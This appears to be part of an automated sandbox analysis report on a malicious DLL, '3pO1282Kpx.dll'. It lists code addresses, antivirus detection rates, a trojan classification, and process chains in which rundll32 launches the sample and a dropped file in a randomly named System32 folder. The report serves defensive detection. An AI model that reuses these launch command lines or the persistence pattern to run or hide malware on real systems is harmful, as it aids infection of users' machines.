                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006ECD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006EBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006EE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DCB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006EEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006EE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006EDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006ED7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006EE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006EDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006DB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033F1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033ECD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DCB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033F0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DCF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DBD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033ED7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033F261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DCE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033EE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033ECE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033DC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D40E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033F1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033F20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297CE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02981291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297A29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296F48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029728D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02962CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029820CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029710CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02969824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02977445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296AE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296AA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296EE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02973782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02964B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029789A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297EDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02973D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297BF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296F73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02980370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296CF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02970E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02970A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296FE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297E899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296A083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029690D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02981CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029752D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029692C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029762F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02974CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029684F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029740FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029646FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02961EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029640E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296C0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029756E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0298261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297C205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02963432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02963228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297EA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02966453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296CE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02973043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297B677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296FA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296B464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02963A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02966869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02967795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02971591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296B191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297DB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02968D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297E3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029643BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029659BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297D7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029785B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297E5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297DDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02970BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029675D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029619C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296A3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029651EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296CB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02964D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297E10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297CD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02979124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296A92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02976540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0296BD61
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6EE8AC90 appears 33 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6EE71DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6EE8AC90 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6EE71DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: 3pO1282Kpx.dllVirustotal: Detection: 23%
                      Source: 3pO1282Kpx.dllReversingLabs: Detection: 17%
                      Source: 3pO1282Kpx.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,akyncbgollmj
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg",diWFDzhLoc
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2616 -ip 2616
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 308
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2616 -ip 2616
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 316
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qfdohhzjskeoxat\kmkxxcep.fzg",Control_RunDLL
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,Control_RunDLL
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,akyncbgollmj
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg",diWFDzhLoc
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qfdohhzjskeoxat\kmkxxcep.fzg",Control_RunDLL
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2616 -ip 2616
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 308
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2616 -ip 2616
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 316
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERE2A7.tmpJump to behavior
                      Source: classification engineClassification label: mal96.troj.evad.winDLL@46/21@0/2
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_02981B99 CreateToolhelp32Snapshot,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:4956:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2616
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5020:64:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2144:120:WilError_01
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: 3pO1282Kpx.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 3pO1282Kpx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.500168593.00000000048E8000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524895289.000000000296C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524500782.000000000296C000.00000004.00000001.sdmp
